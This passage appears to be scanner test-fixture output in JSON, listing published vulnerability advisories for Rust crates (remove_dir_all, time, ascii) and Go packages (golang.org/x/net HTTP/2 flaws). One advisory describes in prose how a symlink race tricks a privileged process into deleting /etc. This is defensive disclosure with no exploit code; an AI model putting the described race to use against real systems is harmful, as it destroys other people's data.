"url": "https://github.com/XAMPPRocky/remove_dir_all/commit/7247a8b6ee59fc99bbb69ca6b3ca4bfd8c809ead" }, { "type": "PACKAGE", "url": "https://github.com/XAMPPRocky/remove_dir_all" }, { "type": "WEB", "url": "https://rustsec.org/advisories/RUSTSEC-2023-0018.html" } ], "database_specific": { "cwe_ids": [ "CWE-366", "CWE-367" ], "github_reviewed": true, "github_reviewed_at": "2023-02-24T16:23:59Z", "nvd_published_at": null, "severity": "LOW" } }, { "modified": "2023-03-04T21:50:30Z", "published": "2023-02-24T12:00:00Z", "schema_version": "1.4.0", "id": "RUSTSEC-2023-0018", "aliases": [ "GHSA-mc8h-8q98-g5hr" ], "summary": "Race Condition Enabling Link Following and Time-of-check Time-of-use (TOCTOU)", "details": "The remove_dir_all crate is a Rust library that offers additional features over the Rust\nstandard library fs::remove_dir_all function.\n\nIt was possible to trick a privileged process doing a recursive delete in an\nattacker controlled directory into deleting privileged files, on all operating systems.\n\nFor instance, consider deleting a tree called 'etc' in a parent directory\ncalled 'p'. Between calling `remove_dir_all(\"a\")` and remove_dir_all(\"a\")\nactually starting its work, the attacker can move 'p' to 'p-prime', and\nreplace 'p' with a symlink to '/'. Then the privileged process deletes 'p/etc'\nwhich is actually /etc, and now your system is broken. There are some\nmitigations for this exact scenario, such as CWD relative file lookup, but\nthey are not guaranteed - any code using absolute paths will not have that\nprotection in place.\n\nThe same attack could be performed at any point in the directory tree being\ndeleted: if 'a' contains a child directory called 'etc', attacking the\ndeletion by replacing 'a' with a link is possible.\n\nThe new code in this release mitigates the attack within the directory tree\nbeing deleted by using file-handle relative operations: to open 'a/etc', the\npath 'etc' relative to 'a' is opened, where 'a' is represented by a file\ndescriptor (Unix) or handle (Windows). With the exception of the entry points\ninto the directory deletion logic, this is robust against manipulation of the\ndirectory hierarchy, and remove_dir_all will only delete files and directories\ncontained in the tree it is deleting.\n\nThe entry path however is a challenge - as described above, there are some\npotential mitigations, but since using them must be done by the calling code,\nit is hard to be confident about the security properties of the path based\ninterface.\n\nThe new extension trait `RemoveDir` provides an interface where it is much\nharder to get it wrong.\n\n`somedir.remove_dir_contents(\"name-of-child\")`.\n\nCallers can then make their own security evaluation about how to securely get\na directory handle. That is still not particularly obvious, and we're going to\nfollow up with a helper of some sort (probably in the `fs_at` crate). Once\nthat is available, the path based entry points will get deprecated.\n\nIn the interim, processes that might run with elevated privileges should\nfigure out how to securely identify the directory they are going to delete, to\navoid the initial race. Pragmatically, other processes should be fine with the\npath based entry points : this is the same interface `std::fs::remove_dir_all`\noffers, and an unprivileged process running in an attacker controlled\ndirectory can't do anything that the attacker can't already do.", "affected": [ { "package": { "ecosystem": "crates.io", "name": "remove_dir_all", "purl": "pkg:cargo/remove_dir_all" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.0.0-0" }, { "fixed": "0.8.0" } ] } ], "database_specific": { "categories": [], "cvss": null, "informational": null, "source": "https://github.com/rustsec/advisory-db/blob/osv/crates/RUSTSEC-2023-0018.json" }, "ecosystem_specific": { "affects": { "arch": [], "functions": [ "remove_dir_all::ensure_empty_dir", "remove_dir_all::remove_dir_all", "remove_dir_all::remove_dir_contents" ], "os": [] } } } ], "references": [ { "type": "PACKAGE", "url": "https://crates.io/crates/remove_dir_all" }, { "type": "ADVISORY", "url": "https://rustsec.org/advisories/RUSTSEC-2023-0018.html" }, { "type": "WEB", "url": "https://github.com/XAMPPRocky/remove_dir_all/commit/7247a8b6ee59fc99bbb69ca6b3ca4bfd8c809ead" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-mc8h-8q98-g5hr" } ] } ], "groups": [ { "ids": [ "GHSA-mc8h-8q98-g5hr", "RUSTSEC-2023-0018" ], "aliases": [ "GHSA-mc8h-8q98-g5hr", "RUSTSEC-2023-0018" ] } ] }, { "package": { "name": "time", "version": "0.1.45", "ecosystem": "crates.io" }, "vulnerabilities": [ { "modified": "2022-12-06T00:16:25Z", "published": "2021-08-25T20:56:46Z", "schema_version": "1.4.0", "id": "GHSA-wcg3-cvx6-7396", "aliases": [ "CVE-2020-26235" ], "summary": "Segmentation fault in time", "details": "### Impact\n\nUnix-like operating systems may segfault due to dereferencing a dangling pointer in specific circumstances. This requires an environment variable to be set in a different thread than the affected functions. This may occur without the user's knowledge, notably in a third-party library.\n\nThe affected functions from time 0.2.7 through 0.2.22 are:\n\n- `time::UtcOffset::local_offset_at`\n- `time::UtcOffset::try_local_offset_at`\n- `time::UtcOffset::current_local_offset`\n- `time::UtcOffset::try_current_local_offset`\n- `time::OffsetDateTime::now_local`\n- `time::OffsetDateTime::try_now_local`\n\nThe affected functions in time 0.1 (all versions) are:\n\n- `at`\n- `at_utc`\n- `now`\n\nNon-Unix targets (including Windows and wasm) are unaffected.\n\n### Patches\n\nIn some versions of `time`, the internal method that determines the local offset has been modified to always return `None` on the affected operating systems. This has the effect of returning an `Err` on the `try_*` methods and `UTC` on the non-`try_*` methods. In later versions, `time` will attempt to determine the number of threads running in the process. If the process is single-threaded, the call will proceed as its safety invariant is upheld.\n\nUsers and library authors with time in their dependency tree must perform `cargo update`, which will pull in the updated, unaffected code.\n\nUsers of time 0.1 do not have a patch and must upgrade to an unaffected version: time 0.2.23 or greater or the 0.3 series.\n\n### Workarounds\n\nLibrary authors must ensure that the program only has one running thread at the time of calling any affected method. Binary authors may do the same and/or ensure that no other thread is actively mutating the environment.\n\n### References\n\n[time-rs/time#293](https://github.com/time-rs/time/issues/293).", "affected": [ { "package": { "ecosystem": "crates.io", "name": "time", "purl": "pkg:cargo/time" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.1" }, { "last_affected": "0.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/08/GHSA-wcg3-cvx6-7396/GHSA-wcg3-cvx6-7396.json" } }, { "package": { "ecosystem": "crates.io", "name": "time", "purl": "pkg:cargo/time" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.2.7" }, { "fixed": "0.2.23" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/08/GHSA-wcg3-cvx6-7396/GHSA-wcg3-cvx6-7396.json" }, "ecosystem_specific": { "affected_functions": [ "time::UtcOffset::local_offset_at", "time::UtcOffset::try_local_offset_at", "time::UtcOffset::current_local_offset", "time::UtcOffset::try_current_local_offset", "time::OffsetDateTime::now_local", "time::OffsetDateTime::try_now_local" ] } } ], "references": [ { "type": "WEB", "url": "https://github.com/time-rs/time/security/advisories/GHSA-wcg3-cvx6-7396" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-26235" }, { "type": "WEB", "url": "https://github.com/time-rs/time/issues/293" }, { "type": "WEB", "url": "https://crates.io/crates/time/0.2.23" }, { "type": "PACKAGE", "url": "https://github.com/time-rs/time" }, { "type": "WEB", "url": "https://rustsec.org/advisories/RUSTSEC-2020-0071.html" } ], "database_specific": { "cwe_ids": [ "CWE-476" ], "github_reviewed": true, "severity": "MODERATE" } }, { "modified": "2023-02-08T15:06:38Z", "published": "2020-11-18T12:00:00Z", "schema_version": "1.4.0", "id": "RUSTSEC-2020-0071", "aliases": [ "CVE-2020-26235" ], "summary": "Potential segfault in the time crate", "details": "### Impact\n\nUnix-like operating systems may segfault due to dereferencing a dangling pointer in specific circumstances. This requires an environment variable to be set in a different thread than the affected functions. This may occur without the user's knowledge, notably in a third-party library.\n\nThe affected functions from time 0.2.7 through 0.2.22 are:\n\n- `time::UtcOffset::local_offset_at`\n- `time::UtcOffset::try_local_offset_at`\n- `time::UtcOffset::current_local_offset`\n- `time::UtcOffset::try_current_local_offset`\n- `time::OffsetDateTime::now_local`\n- `time::OffsetDateTime::try_now_local`\n\nThe affected functions in time 0.1 (all versions) are:\n\n- `at`\n- `at_utc`\n- `now`\n\nNon-Unix targets (including Windows and wasm) are unaffected.\n\n### Patches\n\nPending a proper fix, the internal method that determines the local offset has been modified to always return `None` on the affected operating systems. This has the effect of returning an `Err` on the `try_*` methods and `UTC` on the non-`try_*` methods.\n\nUsers and library authors with time in their dependency tree should perform `cargo update`, which will pull in the updated, unaffected code.\n\nUsers of time 0.1 do not have a patch and should upgrade to an unaffected version: time 0.2.23 or greater or the 0.3 series.\n\n### Workarounds\n\nA possible workaround for crates affected through the transitive dependency in `chrono`, is to avoid using the default `oldtime` feature dependency of the `chrono` crate by disabling its `default-features` and manually specifying the required features instead.\n\n#### Examples:\n\n`Cargo.toml`: \n\n```toml\nchrono = { version = \"0.4\", default-features = false, features = [\"serde\"] }\n```\n\n```toml\nchrono = { version = \"0.4.22\", default-features = false, features = [\"clock\"] }\n```\n\nCommandline: \n\n```bash\ncargo add chrono --no-default-features -F clock\n```\n\nSources: \n - [chronotope/chrono#602 (comment)](https://github.com/chronotope/chrono/issues/602#issuecomment-1242149249) \n - [vityafx/serde-aux#21](https://github.com/vityafx/serde-aux/issues/21)", "affected": [ { "package": { "ecosystem": "crates.io", "name": "time", "purl": "pkg:cargo/time" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.0.0-0" }, { "fixed": "0.2.0" }, { "introduced": "0.2.1-0" }, { "fixed": "0.2.1" }, { "introduced": "0.2.2-0" }, { "fixed": "0.2.2" }, { "introduced": "0.2.3-0" }, { "fixed": "0.2.3" }, { "introduced": "0.2.4-0" }, { "fixed": "0.2.4" }, { "introduced": "0.2.5-0" }, { "fixed": "0.2.5" }, { "introduced": "0.2.6-0" }, { "fixed": "0.2.6" }, { "introduced": "0.2.7-0" }, { "fixed": "0.2.23" } ] } ], "database_specific": { "categories": [ "code-execution", "memory-corruption" ], "cvss": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "informational": null, "source": "https://github.com/rustsec/advisory-db/blob/osv/crates/RUSTSEC-2020-0071.json" }, "ecosystem_specific": { "affects": { "arch": [], "functions": [ "time::OffsetDateTime::now_local", "time::OffsetDateTime::try_now_local", "time::UtcOffset::current_local_offset", "time::UtcOffset::local_offset_at", "time::UtcOffset::try_current_local_offset", "time::UtcOffset::try_local_offset_at", "time::at", "time::at_utc", "time::now" ], "os": [ "linux", "redox", "solaris", "android", "ios", "macos", "netbsd", "openbsd", "freebsd" ] } } } ], "references": [ { "type": "PACKAGE", "url": "https://crates.io/crates/time" }, { "type": "ADVISORY", "url": "https://rustsec.org/advisories/RUSTSEC-2020-0071.html" }, { "type": "REPORT", "url": "https://github.com/time-rs/time/issues/293" } ] } ], "groups": [ { "ids": [ "GHSA-wcg3-cvx6-7396", "RUSTSEC-2020-0071" ], "aliases": [ "GHSA-wcg3-cvx6-7396", "RUSTSEC-2020-0071" ] } ] } ] }, { "source": { "path": "testdata/filter/none/configs/b/", "type": "lockfile" }, "packages": [ { "package": { "name": "golang.org/x/net", "version": "0.1.0", "ecosystem": "Go" }, "vulnerabilities": [ { "modified": "2023-01-24T18:56:46Z", "published": "2023-01-14T00:30:23Z", "schema_version": "1.4.0", "id": "GHSA-fxg5-wq6x-vr4w", "aliases": [ "CVE-2022-41721" ], "summary": "golang.org/x/net/http2/h2c vulnerable to request smuggling attack", "details": "A request smuggling attack is possible when using MaxBytesHandler. When using MaxBytesHandler, the body of an HTTP request is not fully consumed. When the server attempts to read HTTP2 frames from the connection, it will instead be reading the body of the HTTP request, which could be attacker-manipulated to represent arbitrary HTTP2 requests.", "affected": [ { "package": { "ecosystem": "Go", "name": "golang.org/x/net/http2/h2c", "purl": "pkg:golang/golang.org/x/net/http2/h2c" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.0.0-20220524220425-1d687d428aca" }, { "fixed": "0.1.1-0.20221104162952-702349b0e862" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/01/GHSA-fxg5-wq6x-vr4w/GHSA-fxg5-wq6x-vr4w.json" } }, { "package": { "ecosystem": "Go", "name": "golang.org/x/net", "purl": "pkg:golang/golang.org/x/net" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.0.0-20220524220425-1d687d428aca" }, { "fixed": "0.1.1-0.20221104162952-702349b0e862" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/01/GHSA-fxg5-wq6x-vr4w/GHSA-fxg5-wq6x-vr4w.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-41721" }, { "type": "PACKAGE", "url": "https://cs.opensource.google/go/x/net" }, { "type": "WEB", "url": "https://go.dev/cl/447396" }, { "type": "WEB", "url": "https://go.dev/issue/56352" }, { "type": "WEB", "url": "https://pkg.go.dev/vuln/GO-2023-1495" } ], "database_specific": { "cwe_ids": [ "CWE-444" ], "github_reviewed": true, "github_reviewed_at": "2023-01-20T22:40:06Z", "nvd_published_at": "2023-01-13T23:15:00Z", "severity": "HIGH" } }, { "modified": "2023-01-31T21:39:17Z", "published": "2023-01-13T22:39:40Z", "schema_version": "1.4.0", "id": "GO-2023-1495", "aliases": [ "CVE-2022-41721", "GHSA-fxg5-wq6x-vr4w" ], "details": "A request smuggling attack is possible when using MaxBytesHandler.\n\nWhen using MaxBytesHandler, the body of an HTTP request is not fully consumed. When the server attempts to read HTTP2 frames from the connection, it will instead be reading the body of the HTTP request, which could be attacker-manipulated to represent arbitrary HTTP2 requests.", "affected": [ { "package": { "ecosystem": "Go", "name": "golang.org/x/net", "purl": "pkg:golang/golang.org/x/net" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.0.0-20220524220425-1d687d428aca" }, { "fixed": "0.1.1-0.20221104162952-702349b0e862" } ] } ], "database_specific": { "source": "https://vuln.go.dev/ID/GO-2023-1495.json", "url": "https://pkg.go.dev/vuln/GO-2023-1495" }, "ecosystem_specific": { "imports": [ { "path": "golang.org/x/net/http2/h2c", "symbols": [ "h2cHandler.ServeHTTP", "h2cUpgrade" ] } ] } } ], "references": [ { "type": "REPORT", "url": "https://go.dev/issue/56352" }, { "type": "FIX", "url": "https://go.dev/cl/447396" } ] }, { "modified": "2023-01-31T21:39:15Z", "published": "2022-12-08T19:01:21Z", "schema_version": "1.4.0", "id": "GO-2022-1144", "aliases": [ "CVE-2022-41717", "GHSA-xrjj-mj9h-534m" ], "details": "An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests.\n\nHTTP/2 server connections contain a cache of HTTP header keys sent by the client. While the total number of entries in this cache is capped, an attacker sending very large keys can cause the server to allocate approximately 64 MiB per open connection.", "affected": [ { "package": { "ecosystem": "Go", "name": "stdlib", "purl": "pkg:golang/stdlib" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.18.9" }, { "introduced": "1.19.0" }, { "fixed": "1.19.4" } ] } ], "database_specific": { "source": "https://vuln.go.dev/ID/GO-2022-1144.json", "url": "https://pkg.go.dev/vuln/GO-2022-1144" }, "ecosystem_specific": { "imports": [ { "path": "net/http", "symbols": [ "ListenAndServe", "ListenAndServeTLS", "Serve", "ServeTLS", "Server.ListenAndServe", "Server.ListenAndServeTLS", "Server.Serve", "Server.ServeTLS", "http2Server.ServeConn", "http2serverConn.canonicalHeader" ] } ] } }, { "package": { "ecosystem": "Go", "name": "golang.org/x/net", "purl": "pkg:golang/golang.org/x/net" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.4.0" } ] } ], "database_specific": { "source": "https://vuln.go.dev/ID/GO-2022-1144.json", "url": "https://pkg.go.dev/vuln/GO-2022-1144" }, "ecosystem_specific": { "imports": [ { "path": "golang.org/x/net/http2", "symbols": [ "Server.ServeConn", "serverConn.canonicalHeader" ] } ] } } ], "references": [ { "type": "REPORT", "url": "https://go.dev/issue/56350" }, { "type": "FIX", "url": "https://go.dev/cl/455717" }, { "type": "FIX", "url": "https://go.dev/cl/455635" }, { "type": "WEB", "url": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ" } ] }, { "modified": "2023-03-09T21:20:44Z", "published": "2023-02-17T14:00:02Z", "schema_version": "1.4.0", "id": "GHSA-vvpx-j8f3-3w6h", "aliases": [ "CVE-2022-41723" ], "summary": "Uncontrolled Resource Consumption", "details": "A maliciously crafted HTTP/2 stream could cause excessive CPU consumption in the HPACK decoder, sufficient to cause a denial of service from a small number of small requests.", "affected": [ { "package": { "ecosystem": "Go", "name": "golang.org/x/net", "purl": "pkg:golang/golang.org/x/net" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.7.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-vvpx-j8f3-3w6h/GHSA-vvpx-j8f3-3w6h.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-41723" }, { "type": "WEB", "url": "https://go.dev/cl/468135" }, { "type": "WEB", "url": "https://go.dev/cl/468295" }, { "type": "WEB", "url": "https://go.dev/issue/57855" }, { "type": "WEB", "url": "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E" }, { "type": "WEB", "url": "https://pkg.go.dev/vuln/GO-2023-1571" }, { "type": "WEB", "url": "https://vuln.go.dev/ID/GO-2023-1571.json" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2023-02-17T14:00:02Z", "nvd_published_at": "2023-02-28T18:15:00Z", "severity": "HIGH" } }, { "modified": "2023-02-22T20:13:12Z", "published": "2023-02-16T22:31:36Z", "schema_version": "1.4.0", "id": "GO-2023-1571", "aliases": [ "CVE-2022-41723", "GHSA-vvpx-j8f3-3w6h" ], "details": "A maliciously crafted HTTP/2 stream could cause excessive CPU consumption in the HPACK decoder, sufficient to cause a denial of service from a small number of small requests.", "affected": [ { "package": { "ecosystem": "Go", "name": "stdlib", "purl": "pkg:golang/stdlib" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.19.6" }, { "introduced": "1.20.0" }, { "fixed": "1.20.1" } ] } ], "database_specific": { "source": "https://vuln.go.dev/ID/GO-2023-1571.json", "url": "https://pkg.go.dev/vuln/GO-2023-1571" }, "ecosystem_specific": { "imports": [ { "path": "net/http" } ] } }, { "package": { "ecosystem": "Go", "name": "golang.org/x/net", "purl": "pkg:golang/golang.org/x/net" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.7.0" } ] } ], "database_specific": { "source": "https://vuln.go.dev/ID/GO-2023-1571.json", "url": "https://pkg.go.dev/vuln/GO-2023-1571" }, "ecosystem_specific": { "imports": [ { "path": "golang.org/x/net/http2" }, { "path": "golang.org/x/net/http2/hpack", "symbols": [ "Decoder.DecodeFull", "Decoder.Write", "Decoder.parseFieldLiteral", "Decoder.readString" ] } ] } } ], "references": [ { "type": "REPORT", "url": "https://go.dev/issue/57855" }, { "type": "FIX", "url": "https://go.dev/cl/468135" }, { "type": "FIX", "url": "https://go.dev/cl/468295" }, { "type": "WEB", "url": "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E" } ] } ], "groups": [ { "ids": [ "GHSA-fxg5-wq6x-vr4w", "GO-2023-1495" ], "aliases": [ "GHSA-fxg5-wq6x-vr4w", "GO-2023-1495" ] }, { "ids": [ "GO-2022-1144" ], "aliases": [ "GO-2022-1144" ] }, { "ids": [ "GHSA-vvpx-j8f3-3w6h", "GO-2023-1571" ], "aliases": [ "GHSA-vvpx-j8f3-3w6h", "GO-2023-1571" ] } ] } ] }, { "source": { "path": "testdata/filter/none/configs/c/", "type": "lockfile" }, "packages": [ { "package": { "name": "ascii", "version": "0.8.7", "ecosystem": "crates.io" }, "vulnerabilities": [ { "modified": "2023-02-28T20:30:10Z", "published": "2023-02-28T20:30:10Z", "schema_version": "1.4.0", "id": "GHSA-mrrw-grhq-86gf", "summary": "Ascii (crate) allows out-of-bounds array indexing in safe code", "details": "Affected version of this crate had implementation of `From\u003c\u0026mut AsciiStr\u003e` for `\u0026mut [u8]` and `\u0026mut str`. This can result in out-of-bounds array indexing in safe code.\n\nThe flaw was corrected in commit [8a6c779](https://github.com/tomprogrammer/rust-ascii/pull/63/commits/8a6c7798c202766bd57d70fb8d12739dd68fb9dc) by removing those impls.\n", "affected": [ { "package": { "ecosystem": "crates.io", "name": "ascii", "purl": "pkg:cargo/ascii" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.6.0" }, { "fixed": "0.9.3" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-mrrw-grhq-86gf/GHSA-mrrw-grhq-86gf.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/tomprogrammer/rust-ascii/issues/64" }, { "type": "WEB", "url": "https://github.com/tomprogrammer/rust-ascii/pull/63/commits/8a6c7798c202766bd57d70fb8d12739dd68fb9dc" }, { "type": "PACKAGE", "url": "https://github.com/tomprogrammer/rust-ascii" }, { "type": "WEB", "url": "https://rustsec.org/advisories/RUSTSEC-2023-0015.html" } ], "database_specific": { "cwe_ids": [], "github_reviewed": true, "github_reviewed_at": "2023-02-28T20:30:10Z", "nvd_published_at": null, "severity": "MODERATE" } }, { "modified": "2023-02-25T15:13:09Z", "published": "2023-02-25T12:00:00Z", "schema_version": "1.4.0", "id": "RUSTSEC-2023-0015", "summary": "Ascii allows out-of-bounds array indexing in safe code", "details": "Affected version of this crate had implementation of `From\u003c\u0026mut AsciiStr\u003e` for `\u0026mut [u8]` and `\u0026mut str`. This can result in out-of-bounds array indexing in safe code.\n\nThe flaw was corrected in commit [8a6c779](https://github.com/tomprogrammer/rust-ascii/pull/63/commits/8a6c7798c202766bd57d70fb8d12739dd68fb9dc) by removing those impls.", "affected": [ { "package": { "ecosystem": "crates.io", "name": "ascii", "purl": "pkg:cargo/ascii" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.6.1-0" }, { "fixed": "0.9.3" } ] } ], "database_specific": { "categories": [ "memory-corruption" ], "cvss": null, "informational": "unsound", "source": "https://github.com/rustsec/advisory-db/blob/osv/crates/RUSTSEC-2023-0015.json" }, "ecosystem_specific": { "affects": { "arch": [], "functions": [], "os": [] } } } ], "references": [ { "type": "PACKAGE", "url": "https://crates.io/crates/ascii" }, { "type": "ADVISORY", "url": "https://rustsec.org/advisories/RUSTSEC-2023-0015.html" }, { "type": "REPORT", "url": "https://github.com/tomprogrammer/rust-ascii/issues/64" } ] } ], "groups": [ { "ids": [ "GHSA-mrrw-grhq-86gf" ], "aliases": [ "GHSA-mrrw-grhq-86gf" ] }, { "ids": [ "RUSTSEC-2023-0015" ], "aliases": [ "RUSTSEC-2023-0015" ] } ] }, { "package": { "name": "remove_dir_all", "version": "0.5.3", "ecosystem": "crates.io" }, "vulnerabilities": [ { "modified": "2023-02-24T16:23:59Z", "published": "2023-02-24T16:23:59Z", "schema_version": "1.4.0", "id": "GHSA-mc8h-8q98-g5hr", "summary": "Race Condition Enabling Link Following and Time-of-check Time-of-use (TOCTOU) Race Condition in remove_dir_all", "details": "The `remove_dir_all` crate is a Rust library that offers additional features over the Rust standard library `fs::remove_dir_all` function. It suffers the same class of failure as the code it was layering over: TOCTOU race conditions, with the ability to cause arbitrary paths to be deleted by substituting a symlink for a path after the type of the path was checked.\n\nThanks to the Rust security team for identifying the problem and alerting us to it.", "affected": [ { "package": { "ecosystem": "crates.io", "name": "remove_dir_all", "purl": "pkg:cargo/remove_dir_all" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.8.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-mc8h-8q98-g5hr/GHSA-mc8h-8q98-g5hr.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/XAMPPRocky/remove_dir_all/security/advisories/GHSA-mc8h-8q98-g5hr" }, { "type": "WEB", "url": "https://github.com/XAMPPRocky/remove_dir_all/commit/7247a8b6ee59fc99bbb69ca6b3ca4bfd8c809ead" }, { "type": "PACKAGE", "url": "https://github.com/XAMPPRocky/remove_dir_all" }, { "type": "WEB", "url": "https://rustsec.org/advisories/RUSTSEC-2023-0018.html" } ], "database_specific": { "cwe_ids": [ "CWE-366", "CWE-367" ], "github_reviewed": true, "github_reviewed_at": "2023-02-24T16:23:59Z", "nvd_published_at": null, "severity": "LOW" } }, { "modified": "2023-03-04T21:50:30Z", "published": "2023-02-24T12:00:00Z", "schema_version": "1.4.0", "id": "RUSTSEC-2023-0018", "aliases": [ "GHSA-mc8h-8q98-g5hr" ], "summary": "Race Condition Enabling Link Following and Time-of-check Time-of-use (TOCTOU)", "details": "The remove_dir_all crate is a Rust library that offers additional features over the Rust\nstandard library fs::remove_dir_all function.\n\nIt was possible to trick a privileged process doing a recursive delete in an\nattacker controlled directory into deleting privileged files, on all operating systems.\n\nFor instance, consider deleting a tree called 'etc' in a parent directory\ncalled 'p'. Between calling `remove_dir_all(\"a\")` and remove_dir_all(\"a\")\nactually starting its work, the attacker can move 'p' to 'p-prime', and\nreplace 'p' with a symlink to '/'. Then the privileged process deletes 'p/etc'\nwhich is actually /etc, and now your system is broken. There are some\nmitigations for this exact scenario, such as CWD relative file lookup, but\nthey are not guaranteed - any code using absolute paths will not have that\nprotection in place.\n\nThe same attack could be performed at any point in the directory tree being\ndeleted: if 'a' contains a child directory called 'etc', attacking the\ndeletion by replacing 'a' with a link is possible.\n\nThe new code in this release mitigates the attack within the directory tree\nbeing deleted by using file-handle relative operations: to open 'a/etc', the\npath 'etc' relative to 'a' is opened, where 'a' is represented by a file\ndescriptor (Unix) or handle (Windows). With the exception of the entry points\ninto the directory deletion logic, this is robust against manipulation of the\ndirectory hierarchy, and remove_dir_all will only delete files and directories\ncontained in the tree it is deleting.\n\nThe entry path however is a challenge - as described above, there are some\npotential mitigations, but since using them must be done by the calling code,\nit is hard to be confident about the security properties of the path based\ninterface.\n\nThe new extension trait `RemoveDir` provides an interface where it is much\nharder to get it wrong.\n\n`somedir.remove_dir_contents(\"name-of-child\")`.\n\nCallers can then make their own security evaluation about how to securely get\na directory handle. That is still not particularly obvious, and we're going to\nfollow up with a helper of some sort (probably in the `fs_at` crate). Once\nthat is available, the path based entry points will get deprecated.\n\nIn the interim, processes that might run with elevated privileges should\nfigure out how to securely identify the directory they are going to delete, to\navoid the initial race. Pragmatically, other processes should be fine with the\npath based entry points : this is the same interface `std::fs::remove_dir_all`\noffers, and an unprivileged process running in an attacker controlled\ndirectory can't do anything that the attacker can't already do.", "affected": [ { "package": { "ecosystem": "crates.io", "name": "remove_dir_all", "purl": "pkg:cargo/remove_dir_all" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.0.0-0" }, { "fixed": "0.8.0" } ] } ], "database_specific": { "categories": [], "cvss": null, "informational": null, "source": "https://github.com/rustsec/advisory-db/blob/osv/crates/RUSTSEC-2023-0018.json" }, "ecosystem_specific": { "affects": { "arch": [], "functions": [ "remove_dir_all::ensure_empty_dir", "remove_dir_all::remove_dir_all", "remove_dir_all::remove_dir_contents" ], "os": [] } } } ], "references": [ { "type": "PACKAGE", "url": "https://crates.io/crates/remove_dir_all" }, { "type": "ADVISORY", "url": "https://rustsec.org/advisories/RUSTSEC-2023-0018.html" }, { "type": "WEB", "url": "https://github.com/XAMPPRocky/remove_dir_all/commit/7247a8b6ee59fc99bbb69ca6b3ca4bfd8c809ead" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-mc8h-8q98-g5hr" } ] } ], "groups": [ { "ids": [ "GHSA-mc8h-8q98-g5hr", "RUSTSEC-2023-0018" ], "aliases": [ "GHSA-mc8h-8q98-g5hr", "RUSTSEC-2023-0018" ] } ] }, { "package": { "name": "time", "version": "0.1.45", "ecosystem": "crates.io" }, "vulnerabilities": [ { "modified": "2022-12-06T00:16:25Z", "published": "2021-08-25T20:56:46Z", "schema_version": "1.4.0", "id": "GHSA-wcg3-cvx6-7396", "aliases": [ "CVE-2020-26235" ], "summary": "Segmentation fault in time", "details": "### Impact\n\nUnix-like operating systems may segfault due to dereferencing a dangling pointer in specific circumstances. This requires an environment variable to be set in a different thread than the affected functions. This may occur without the user's knowledge, notably in a third-party library.\n\nThe affected functions from time 0.2.7 through 0.2.22 are:\n\n- `time::UtcOffset::local_offset_at`\n- `time::UtcOffset::try_local_offset_at`\n- `time::UtcOffset::current_local_offset`\n- `time::UtcOffset::try_current_local_offset`\n- `time::OffsetDateTime::now_local`\n- `time::OffsetDateTime::try_now_local`\n\nThe affected functions in time 0.1 (all versions) are:\n\n- `at`\n- `at_utc`\n- `now`\n\nNon-Unix targets (including Windows and wasm) are unaffected.\n\n### Patches\n\nIn some versions of `time`, the internal method that determines the local offset has been modified to always return `None` on the affected operating systems. This has the effect of returning an `Err` on the `try_*` methods and `UTC` on the non-`try_*` methods. In later versions, `time` will attempt to determine the number of threads running in the process. If the process is single-threaded, the call will proceed as its safety invariant is upheld.\n\nUsers and library authors with time in their dependency tree must perform `cargo update`, which will pull in the updated, unaffected code.\n\nUsers of time 0.1 do not have a patch and must upgrade to an unaffected version: time 0.2.23 or greater or the 0.3 series.\n\n### Workarounds\n\nLibrary authors must ensure that the program only has one running thread at the time of calling any affected method. Binary authors may do the same and/or ensure that no other thread is actively mutating the environment.\n\n### References\n\n[time-rs/time#293](https://github.com/time-rs/time/issues/293).", "affected": [ { "package": { "ecosystem": "crates.io", "name": "time", "purl": "pkg:cargo/time" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.1" }, { "last_affected": "0.2" } ] } ], "database_specific": { "source": 